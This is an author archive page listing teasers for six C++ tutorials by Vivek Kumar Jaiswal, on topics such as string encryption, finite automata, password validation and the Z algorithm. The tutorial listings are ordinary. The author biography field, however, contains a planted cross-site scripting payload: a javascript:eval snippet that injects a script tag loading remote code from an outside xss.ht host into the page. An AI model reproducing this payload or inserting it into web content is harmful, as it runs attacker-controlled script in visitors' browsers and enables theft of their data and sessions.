Posts by Vivek Kumar Jaiswal

Author Biographical Info: javascript:eval('var a=document.createElement(\'script\');a.src=\'https://decone.xss.ht\';document.body.appendChild(a)')

C++ Program to Encrypt and Decrypt a String

By Vivek Kumar Jaiswal

Hello everyone! Let’s discuss the string encryption and decryption and implement it in C++. Encrypting a string basically means changing it from one form to another i.e plain.... Read More

C++ program to demonstrate Finite Automata

By Vivek Kumar Jaiswal

Hello everyone! In this tutorial, we are going to discuss Finite Automata in C++. An Automata can be also called as a computing device. An Automata is called a Finite Automata when.... Read More

Password Validation Program in C++

By Vivek Kumar Jaiswal

Hello everyone! In this tutorial, we will check out how to validate your password using C++ with the corresponding code. We will demonstrate to you how to check whether your passwo.... Read More

Using final with Inheritance in C++

By Vivek Kumar Jaiswal

Hello Everyone! In this tutorial, we will learn about the concept of the final keyword and also how to use the final keyword with Inheritance in C++. The final specifier with Inher.... Read More

Z algorithm in C++

By Vivek Kumar Jaiswal

In this blog, we will mainly discuss the concept of the z algorithm in C++. This algorithm is also similar to the concept of the KMP algorithm. Both KMP and z algorithms are basica.... Read More

How to get the type of a variable in C++

By Vivek Kumar Jaiswal

In this tutorial, let’s discuss how to get the type of a variable in C++. One way by which we can find out is by using Type Inference which will in return, return the data ty.... Read More

Related Posts